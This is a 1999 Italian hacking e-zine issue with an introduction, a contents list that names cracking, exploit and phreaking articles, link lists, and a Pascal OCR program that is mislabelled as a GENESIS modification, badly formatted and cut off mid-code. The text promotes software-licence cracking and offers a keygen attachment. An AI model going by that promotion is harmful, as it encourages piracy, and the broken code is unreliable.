Newbies 4

Transcript

Newbies 4
@-,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,-@
|
_
_
____ _
|
| | \ | | _____
_| __ )(_) ___ ___ |
-+- | \| |/ _ \ \ /\ / / _ \| |/ _ Y __|-+: | |\ | __/\ V V /| |_) | | __|__ \ :
| |_| \_|\___| \_/\_/ |____/|_|\___|___/ |
@-,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,.,”ì'ì”,-@
NEW BIES (num 4) (data 26/08/99)
[ powered By ZeroCool and N0bodY88 ]
DISCLAIMER LEGALE
-----------------------------------------------------------------------------IL NEWBIES STAFF NON SI ASSUME NESSUNA RESPONSABILITA' X L'UTILIZZO DELLE
TECNICHE SOTTO RIPORTATE, LE QUALI SONO STATE DISTRIBUITE UNICAMENTE X
CONDIVIDERE LE CONOSCENZE DA NOI "ACUISITE" (mitico edu...) E PER CERCARE
QUALCUNO CON CUI CONFONTARE LE NS ESPERIENZE E LE CONOSCENZE X MIGLIORARE
VICENDEVOLMENTE.....DIVERTENDOSI!
N0bodY88 of NewBies Staff
-----------------------------------------------------------------------------PREMESSA
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
Questa e-zine e' nata in una giornata qualsiasi di gennaio, mentre 2 newbies
stavano parlando tra loro in IRC di non mi ricordo cosa. Da quel fatidico
giorno la e-zine e' cresciuta, le persone che ho contattato x scrivere un
articolo mi hanno dato la loro disponibilita' e entro alcuni giorni mi hanno
fatto avere il loro operato. Alcune persone hanno fatto tardi x notti intere
(fra cui il sottoscritto) ed hanno sacrificato il loro tempo x creare qualcosa
che fosse nuovo, divertente, che ci facesse diventare + bravi, + amici, + uniti
e forse...beh...forse anche + famosi...hihihi! Questo e' quello che abbiamo
realizzato insieme, collaborando e scambiandoci opinioni. Se questa e-zine
non vi piace, e' troppo semplice o e' stupida non scriveteci (oppure scriveteci
x migliorare un art. della e-zine sfruttando le vostre conoscenze) ma se solo
sara' piaciuta ad una persona, se solo un ragazzo dopo aver letto questa avra'
deciso di passare a linux, di programmare in visual basic, di farsi una propria
backdoor o di mettersi a studiare come si usa telnet (troppo poco attrezzato di
voci nei menu x essere quello tanto decantato dovunque, ma anche troppo
simpatico
con il suo prompt a mo di Commodore 64) allora questa e-zine sara' servita a
qualcosa. E ricordate...newbies si nasce, hacker si diventa.
Buona lettura ^__^
N0bodY88
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
INTRODUZIONE:
Creatura nata per vivere e cibarsi del Sacro cibo della Conoscenza ,
attendiamo alla ricerca di nuovi orizzonti nuove culture con cui confrontarci.
Crediamo da tempo in cio' che altri non credono
Vediamo cio' che gli altri non immaginano ,
Sentiamo il suono della conoscenza che impregna la vista e la mente ,
Noi siamo il futuro , un futuro in cui il mondo cieco e stolto non vuole
credere . Siamo hacker e ricorda tu stolto che il nostro grido e'
unisono : CoNosCenZa .
Il mondo forse non e' preparato ad accetare usi e idee che quotidianamente
noi promulghiamo.
Tu giudicatore Tu fautore di morte ... Ricorda noi siamo e sempre saremo
piu' forti di te' perche' il sapere ci affascina come un frutto proibito e
quotidianamente ce ne cibiamo. Questo e' il mio credo , la mia vita e il mio
essere stesso..
ZeroCool
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍËÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Í»
º
ARTICOLO
ÌÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎÍÎ͹
AUTORE
º
ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
͹
|PREMESSA
N0bodY88
|
|INTRODUZIONE
ZeroCool
|
|NOVITA'
NewBies Staff
|
³
BFI, SPIPPOLATORI, T0RMENTO, VANA IMAGO E TANTO ALTRO
N0bodY88
³
³
ACTUAL SITUATION: [DIFFERENCE]
ZeroCool
³
³
RIEPILOGO LINK IN ORDINE ALFABETICO
N0bodY88
³
|INFO SUGLI ALLEGATI
NewBies Staff
|
³
2 PAROLE SUGLI ALLEGATI
N0bodY88
³
|PROGRAMMAZIONE
NewBies Staff
|
³
GENESIS (GEneral NEural SImulation System)
ZeroCool
³
³
PROGETTO ANGELA : OVVERO COME BUTTARE IL TEMPO ;)
N0bodY88
³
|CRACKING
NewBies Staff
|
³
HOW TO VTT 1.75
DeViLNeT
³
³
GENERATORE DI CHIAVI X MIRC32 5.6
Cod
³
³
MA XCHE' SBORSARE 29 DOLLARI PER REGISTRARE WINZIPPO ???? DeViLNeT
³
³
APPROFONDIMENTO SULLE CHIAVI HASP
BlackDruiD
³
|TEORIA
NewBies Staff
|
³
SOX...WINGAYZ E PROXY...CHE CONFUSIONE...
Dante
Alighieri³
³
ER COSIDDETTO MONITORAGGIO
N0bodY88
³
|TRADUZIONI
NewBies Staff
|
³
COME CAMBIARE IL NOME DI REGISTRAZIONE DI WINDOWS 95 E 98 N0bodY88
³
³
FINGERD EXPLOIT
N0bodY88
³
|LE INTERVISTE E LE NOTTATE IMPOSSIBILI
NewBies Staff
|
³
INTERVISTA AD UN PERFETTO ANONIMO
N0bodY88
³
|PHREAKING
NewBies Staff
|
³
TELECUM BRUTE FORCIN'
Dante
Alighieri³
|LINUX - UNIX - VARI
NewBies Staff
|
³
COME PARTIZIONARE L'HD X LINUX
Z10-K41i
³
³
GESTIONE DEI PERMESSI SU FILE E DIRECTORY DI LINUX/UNIX EsPoNeNtIaL
FoRcE³
³
SCHERZI SIMPATICI DA FARE AL SYSADMIN
Pankrazio
³
³
TABELLUZZA DI VI
Dante+N0bodY88
³
³
MINI GUIDA ALL'INSTALLAZIONE DI BITCHX SOTTO UNIX OS
\JusTme\
³
³
COME CI SI MUOVE IN LINUX
St0rM BriNgeR
³
³
COME SI CREA UN NUOVO UTENTE IN LINUX
St0rM BriNgeR
³
³
COSA FARE DOPO AVER OTTENUTO ACCESSO AD UNA SHELL
St0rM BriNgeR
³
³
FILOSOFIA DI UNIX
X-ReWoP
³
³
COME MONTARE IL CDROM IN LINUX
St0rM BriNgeR
³
|IL MONDO DI IRC
NewBies Staff
|
³
GUIDA X I BOT FOR REALLY NEWBIES BUT GOOD TO READ
Pankrazio
³
³
SkRiPT mIRC? NO POBBEM! 1^tempo
Ennaro
³
³
IRCWAR - FONDAMENTI
St0rM BriNgeR
³
|HACKING DI TUTTO DI PIU' E DIVERSI ART. MOLTO INTERESSANTI
NewBies Staff
|
³
IL MIO IP? BOH!
Mr Skull
³
³
LE LEGGI IN ITALIA SULL'HACKING
S_A_S_H_A
³
³
GUIDA ALL' ASSEMBLAGGIO DI UN COMPUTER DALLA A ALLA Z
Devil_666
³
³
MANIFESTO DI CARNIFEX
Carnifex
³
³
RENDIAMOCI ANONIMI
ZeroCool
³
³
IL MIO EXPLOIT PREFERITO... SM 8.8.4 !!!
Dante
Alighieri³
³
TELEPIU' TERRESTRE: INFO VARIE
JohnnyRunner
³
³
BENZINA A GO G0!
HarLoK
³
³
BREVE E SEMPLICE LISTA DI ATTACCHI BASATI SU DATI
KarmA_YogA
³
³
MP3 IN AUTO: FANTASIE OLTRE LA REALTA'
JohnnyRunner
³
³
L'UOVO DE COLOMBO
Dante
Alighieri³
³
QUALKE TRUCCO DA PIPPO CALO'
Pippo Calo'
³
|SALUTI
N0bodY88
|
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÙ
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°°°°°°°°°ÛÛÛ°°°ÛÛ°°ÛÛÛÛÛÛ°°ÛÛ°°°°°°°ÛÛ°°ÛÛ°°ÛÛÛÛÛÛÛÛÛÛ°°°°°°°°°°ÛÛ°°°°°°°°²
²°°°°°°°°°°°ÛÛÛÛ°°ÛÛ°°ÛÛ²²ÛÛ°°°ÛÛ°°°°°ÛÛ°°°°°°°Û°°°ÛÛ°°°Û°°°°°ÛÛÛ°°ÛÛ°°°°°°°°²
²°°°°°°°°°°°ÛÛ°ÛÛ°ÛÛ°°ÛÛ²²ÛÛ°°°°ÛÛ°°°ÛÛ°°°°ÛÛ°°ÛÛÛ°ÛÛ°ÛÛÛ°°°°ÛÛ²ÛÛ°°°°°°°°°°°²
²°°°°°°°°°°°ÛÛ°°ÛÛÛÛ°°ÛÛ²²ÛÛ°°°°°ÛÛ°ÛÛ°°°°°ÛÛ°°°°°°ÛÛ°°°°°°°ÛÛÛÛÛÛÛ°°°°°°°°°°²
²°°°°°°°°°°°ÛÛ°°°ÛÛÛ°°ÛÛÛÛÛÛ°°°°°°ÛÛÛ°°°°°°ÛÛ°°°°°°ÛÛ°°°°°°ÛÛ°°°°°ÛÛ°°°°°°°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ BFI, SPIPPOLATORI, T0RMENTO, VANA IMAGO E TANTO ALTRO ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
BFI = ovviamente parlando di BFI non si puo' non nominare il fantastico gruppo
che ci sta dietro ovvero quelli di softproject, che sono uno tra i
gruppi piu' tosti e produttivi della scena italiana, e non solo x la
loro e-zine x la quale i complimenti sono sempre troppo pochi rispetto
a quelli che meriterebbe, ma anke x il loro fantastico sito che potete
vedere andando al www.softpj.com x il quale /sPIRIT/ se non ha sudato
sangue poco ci manca... Non perdetevi inoltre i vari exploit scoperti
(e qui si denota anke il livello del gruppo) dai membri del softpj
stessi. Come al solito che la maledizione vi colga se vi perdete anke+
un solo bit di sito e e-zine... inoltre leggetevi il mitico numero 6
(che io ho gia' stampato) e il number estivo speciale x il quale vi
dovrete far ricoverare x tremenda ridarola acuta...
SPIPPOLATORI = gli spippolatori continuano a sfornare ottimi numeri della loro
magnifica e-zine NetRunners piena di articoli interessanti che
sta avendo un successo sia x le qualita' e la voglia di fare
degli scrittori sia x l'ampia conoscenza che sta alle spalle
di quei nomi che vedete in fondo agli articoli. Il sito ormai
considerato un must sia x il newbies sia x l'hacker piu'
affermato ha cominciato il grande e mitico progetto di cercare
di raccogliere in un unico sito tutte le e-zine nostrane
attinenti all'hacking e a tutte le varie forme di liberta' e
protesta. Segnalo inoltre la marea di testi disponibile sul
sito di produzione degli Spp ma anke mirrorata dai piu' famosi
siti di hacking, unix e dintorni come quello dei dislessici,
quello di quequero e molti altri di cui sarete felici di fare
la conoscenza...
RINGZERO = questo sito creato dal gruppo stesso di Ring0 continua a pubblicare
sempre nuovi tut e sempre piu' interssanti che vanno bene sia x
chi di crackers conosce solo quelli da mangiare sia x chi la sera
dialoga in chat con xOANON, +ORC o FRAVIA quindi fate un po' voi
ma se anke solo minimamente vi interessate di programmazione e/o
craking io un sito cosi' non credo che me lo perderei x nulla al
mondo...quindi crackers di tutti italia...tutti subito al mitico
sito http://ringzer0.cjb.net e vai giu' di teleport ;)
T0RMENT0 = ebbene si' con mia enorme gioia T0rment0 ha deciso di fare una
propria e-zine che sinceramente mi sembra molto piu' che valida e
che abbraccia la filosofia dei newbies. Ottima sia come raccolta
di exploit che come guida x non scoraggiarsi davanti ai listati di
c o ai comandi e la filosofia di unix...che dire...scaricatevela e
giudicatela voi ovviamente al sito del ns mitico scrittore (e ora
anke redattore) T0rment0. E ricordatevi di dare una okkiata anke
al resto del sito oltre a scaricare la e-zine...dove direte voi?
Ovviamente a http://web.interpuntonet.it/xj/ !!!
VANA IMAGO = che dire imo una e-zine molto bella fatta da un grande amico che
mi dispiace vedere cosi' poco, x il resto che dire...basta che
ve la scarichiate e andrete da dio! Per chi non visita + il sito
da un po' sappiate che e' uscito il mitico numero 3 quindi
correte in edicola..ehm...scusate...sapete...l'emozione...
QUEQUERO = l'ormai sempre piu' ricercato Quequero sta sulle bocche di tutti
con la sua fantastica UIC (Universita' Italiana di Cracking) dove
trovare tutorial, attrezzi del mestiere, consigli e molto molto
altro (se non quasi tutto) che potete subito andare a visitare
scrivendo nella barra del vostro browser (ie o netscape non importa
tanto imo (x i precisini lo so ci sono anke opera, lynx etc ;P)) il
seguente url http://quequero.cyb.net dopodiche' crackare non sara'
piu' un sogno cosi' lontanto anke se nonostante tutto la strada e'
lunga e in salita ma poi arriva la discesa :)
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
ACTUAL SITUATION: [DIFFERENCE]
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
La situazione attuale in italia prevede l'implementazione di " un nuovo "
sistema di trasmissione dati l'adsl implementato per ora a milano a quanto
so' da 200 beta tester .
La formula inq uestione che verra' adottata sara' di due tipi:
connessione a 2mb/s con ipfisso
connessione a 4mb/s con ipfisso
I prezzi non saranno la bolletta telefonica e il costo dell'abbonamento pur
adsl addottando la normale linea telefonica per il collegamento . [invia una
stringa alfanumerica al provider].
Ci sara'solamente un fisso da pagare e 0 bolletta al momento non conosco i
prezzi.
The situation in usa is different between italy we have now implement a
various type of technology : adsl [aol 4mb/s ] and cable 7 [1.2mb/s]
The price that society as aol and cable inwiry offer are very good in this
period we 've a price of 20USD for month for cable seven and about 80USD
for aol service..
I know that some place in usa are not connected to this service as ohio
[for adsl] .
Cable modem prize and connectivity from some Inc. are up higher.
ZeroCool
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
RIEPILOGO LINK IN ORDINE ALFABETICO
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
[
[
[
[
[
[
[
[
[
[
[
[
D.I.B. ----------------------------------------------> http://come.to/dib
NetRunners ---------------------> http://members.tripod.com/~teresacanis/
NewBies -----------------------------------------> http://newbies.tsx.org
Quequero ---------------------------------------> http://quequero.cjb.net
RFC (sito dove le potete trovare) ------------> http://www.faqs.org/rfcs/
RingZ3rO ---------------------------------------> http://ringzer0.cjb.net
Softpj -------------------------------------------> http://www.softpj.com
SoftWord ------------------------------------------> softword.webjump.com
Spaghetti Phreakers -----------------> http://come.to/spaghettiphreakers/
Spippolatori -------------------------------> http://www.spippolatori.com
T0rment0 -------------------------------> http://web.interpuntonet.it/xj/
Vana - Imago ------------------> http:/members.xoom.com/eripper/index.htm
]
]
]
]
]
]
]
]
]
]
]
]
NOTA DI N0bodY88 = Se volete che il nome della vs crew con l'url del vs sito
sia presente nella soprascritta tabella basta che ce lo
comunichiate e sara' fatto sia x siti newbies che x siti
di hacking.
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°°°°°°°°°°°°°°°°°°ÛÛ°°°°ÛÛ°°°°ÛÛÛÛ°°ÛÛÛÛÛÛÛ°°°°°°°°ÛÛÛÛÛÛÛÛÛÛÛÛÛ°Û°°°°°°°°°°°°²
²°°°°°°°°°°°ÛÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°°°°°°ÛÛÛ°°°°°°ÛÛÛ°°°°°°°°°°°°°°°°°°°²
²°°°°°°°°°°ÛÛ²ÛÛ°°°ÛÛ°°°°ÛÛ°°°°ÛÛÛÛ°°ÛÛ°ÛÛÛÛ°°°ÛÛ²ÛÛ°°°°°ÛÛÛ°°°°ÛÛÛ°°°°°°°°°°°°²
²°°°°°°°°°ÛÛÛÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛ°°°°ÛÛÛ°°°°ÛÛÛ°°°°°°°°°°°°²
²°°°°°°°°ÛÛ°°°°°ÛÛ°ÛÛÛÛÛ°ÛÛÛÛÛ°ÛÛÛÛ°°ÛÛÛÛÛÛÛ°ÛÛ°°°°°ÛÛ°°°ÛÛÛ°°°°ÛÛÛ°°°°°°°°°°°°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
2 PAROLE SUGLI ALLEGATI:
- angela.pas = sorgente del programma angela fatto da un pazzo della crew...
- angela.exe = l'eseguibile x chi non ha tempo di installarsi pascal o x chi
vuole dare solo un occhiata a che cazzata di prog e'...
- mirckey.exe = prog che genera le chiavi x mirc fatto dal mitico cod.
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
²°ÛÛÛ°ÛÛÛ°ÛÛÛ°ÛÛÛÛ°ÛÛÛ°°°°°Û°°°°°ÛÛ°°°ÛÛÛÛ°°°ÛÛ°°°°°Û°°°°°ÛÛÛ°Û°ÛÛÛ°ÛÛ°°Û°ÛÛ°²
²°Û°Û°Û°Û°Û°Û°Û°°°°Û°Û°°°°ÛÛÛ°°°°Û°Û°Û°ÛÛ°Û°Û°Û°°°°ÛÛÛ°°°°°°Û°Û°Û°Û°Û°Û°Û°Û°°²
²°ÛÛÛ°ÛÛÛ°Û°Û°Û°ÛÛ°ÛÛÛ°°°ÛÛ°ÛÛ°°°Û°°Û°°ÛÛ°°Û°°Û°°°ÛÛ°ÛÛ°°°°Û°°Û°Û°Û°Û°°ÛÛ°ÛÛ°²
²°Û°°°ÛÛ°°Û°Û°Û°°Û°ÛÛ°°°ÛÛÛÛÛÛÛ°°Û°°°°°ÛÛ°°°°°Û°°ÛÛÛÛÛÛÛ°°Û°°°Û°Û°Û°Û°°°Û°Û°°²
²°Û°°°Û°Û°ÛÛÛ°ÛÛÛÛ°Û°Û°ÛÛ°°°°°ÛÛ°Û°°°°°ÛÛ°°°°°Û°ÛÛ°°°°°ÛÛ°ÛÛÛ°Û°ÛÛÛ°Û°°°Û°ÛÛ°²
ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ
ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³
GENESIS (GEneral NEural SImulation System)
³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
GENESIS (GEneral NEural SImulation System)
Morgan Kaufmann, San Mateo, CA. 485-492, 1989
Genesis come potete leggere e' un progetto di tutto conto . Sinceramente i
progetti sperimentali mi hanno sempre interessato e quindi una volta
riinstallato per la 100 volta il mio caro unix ho compilato subito questo
pakketo indubbiamente unico nel suo genere . Ma volutamente distribuito con i
source e docz per una eventuale modifica. Bhe dopo due giorni di attenta
lettura e documentazione folle tra le migliori universita' online mi sono
venute un paio di idee che ho subito applicato , bhe vediamole insieme
Genesis in se ' stesso ha una struttura molto ramificata ma semplice e
ideale per una sua ricompilazione con eventuali modiche che ho apportato.
bhe pensiamo di modificarlo per non limitarlo alle 4 funzioni [guia'bellisime
che gli sono s tate assegnate]
allora:
/************************************************************************
*
*
* File: test.pas
*
*
*
* training and analysis of
*
* multilayer perceptron (MLP) neural networks for mapping. Such
*
* networks have sigmoidal hidden units and linear activations in
*
* the output units.
*
*
*
* General routines.
*
*
*
************************************************************************
program OCR;
(* (c)
Program -(1) reads PCX file into a viewport ;
(2) converts viewport to a 2 dimensional picture (Xs and .s);
(3) execs to BrainMaker (a neural network);
(4) BrainMaker evaluates the pictures;
(4) converts BrainMaker output evaluations to text;
requires BrainMaker neural net (from California Scientific Software)
and PCX Tools (from Genesis Programming).
*)
uses
Crt, Dos, Graph, pcx_tp;
var
F, F2 : text;
const
{ BGI fonts }
Fonts : array[0..4] of string[13] =
('DefaultFont', 'TriplexFont', 'SmallFont',
'SansSerifFont', 'GothicFont');
{ BGI text directions }
TextDirect : array[0..1] of string[8] =
('HorizDir', 'VertDir');
Num_of_patterns
Num_of_characters
Input_file_from_neural_net
Output_file_for_neural_net
OCR_Output_file
PCX_file
Line_length
Threshold
PCX_type
=
=
=
=
=
=
=
=
=
10;
2000; { for 80 x 25 Viewport }
'C:\TP\EXE\BrainRTS.Out';
'C:\TP\EXE\BrainRTS.In';
'C:\TP\EXE\OCR.Out';
'C:\TP\EXE\a.PCX';
79;
0.60;
pcxCGA_6;
type
Weights = array[1..Num_of_characters] of string[4];
Patterns = array[1..Num_of_characters] of string[1];
{ objects }
NNIptr = ^neural_net_interpreter;
neural_net_interpreter = object
Array_index
: integer;
First_char, S : string;
Weight
: Weights;
Output_pattern : Patterns;
constructor Init;
destructor Done; virtual;
procedure Get_weights;
procedure Output_characters;
end;
Screenptr = ^screen;
screen = object
GraphDriver : integer; { Graphics device driver }
GraphMode
: integer; { Graphics mode value }
MaxX, MaxY : word;
{ Maximum screen resolution }
ErrorCode
: integer; { Reports any graphics errors }
MaxColor
: word;
{ Maximum color value available }
pcxReturn
: integer;
PixelStatus : integer;
ViewInfo
: ViewPortType;
constructor init;
destructor done; virtual;
procedure Initialize;
end;
var
OldExitProc : Pointer;
{ Saves exit procedure address }
{$F+}
procedure MyExitProc;
begin
ExitProc := OldExitProc; { Restore exit procedure address }
CloseGraph;
{ Shut down the graphics system }
end; { MyExitProc }
{$F-}
procedure screen.Initialize;
{ Initialize graphics and report errors}
var
InGraphicsMode: boolean; { Flags graphics initialization}
PathToDriver : string; { Stores DOS path to *.BGI & *.CHR }
begin
{ When using Crt & graphics, turn }
{ off Crt's memory-mapped writes }
DirectVideo := False;
OldExitProc := ExitProc; { Save previous exit proc }
ExitProc := @MyExitProc; { Insert our exit proc in chain }
PathToDriver := '';
repeat
GraphDriver := Detect;
{ Autodetect graphics adapter }
InitGraph(GraphDriver, GraphMode, PathToDriver);
ErrorCode := GraphResult;
{ Preserve error return }
if ErrorCode <> grOK then
{ Error? }
begin
Writeln('Graphics error: ', GraphErrorMsg(ErrorCode));
if ErrorCode = grFileNotFound then
begin
Writeln('Enter full path to BGI driver');
Writeln('or type <Ctrl-Break> to quit.');
Readln(PathToDriver);
Writeln;
end
else
Halt(1);
{ Some other error: terminate }
end;
until ErrorCode = grOK;
end; { Initialize }
{ object constructors & destructors }
constructor screen.init;
begin
end;
destructor screen.done;
begin
end;
constructor neural_net_interpreter.init;
begin
end;
destructor neural_net_interpreter.done;
begin
end;
{ object methods }
procedure neural_net_interpreter.Get_weights;
var
This_weight : string[4];
This_pattern : string[1];
Count
: integer;
W
: word;
Char_Ptr
: integer;
begin
FOR Count := 1 TO Num_of_characters DO
begin
Weight[Count]
:= ' ';
Output_pattern[Count] := ' ';
end;
{ Initialize arrays }
Assign(F,Input_file_from_neural_net);
Reset(F);
Array_index := 1;
WHILE Array_index <= Num_of_characters DO
begin
Readln(F,S);
First_char := Copy(S,1,1);
IF First_char = ' ' THEN
begin
Char_Ptr := 2;
FOR Count := 1 TO Num_of_patterns DO
begin
This_weight := Copy(S,Char_Ptr,4);
Weight[Array_index] := This_weight;
Char_Ptr := Char_Ptr + 5;
This_pattern := Copy(S,Char_Ptr,1);
Output_pattern[Array_index] := This_pattern;
Char_Ptr := Char_Ptr + 2;
Inc(Array_index);
end;
end;
end;
Close(F);
end;
procedure neural_net_interpreter.output_characters;
var
Output_char : string;
Pattern_count, Char_count, ReturnCode : integer;
Wt, New_weight : real;
begin
Assign(F2,OCR_Output_file);
Rewrite(F2);
Array_index := 1;
Char_count := 1;
WHILE Array_index <= Num_of_characters DO
begin
Pattern_count := 1;
Wt := 0;
Output_char
:= ' ';
WHILE Pattern_count <= Num_of_patterns DO
begin
Val(Weight[Array_index],New_weight,ReturnCode);
IF New_weight > Wt THEN
begin
Wt := New_weight;
Output_char := Output_pattern[Array_index];
end;
Inc(Pattern_count);
Inc(Array_index);
end;
IF Wt >= Threshold THEN
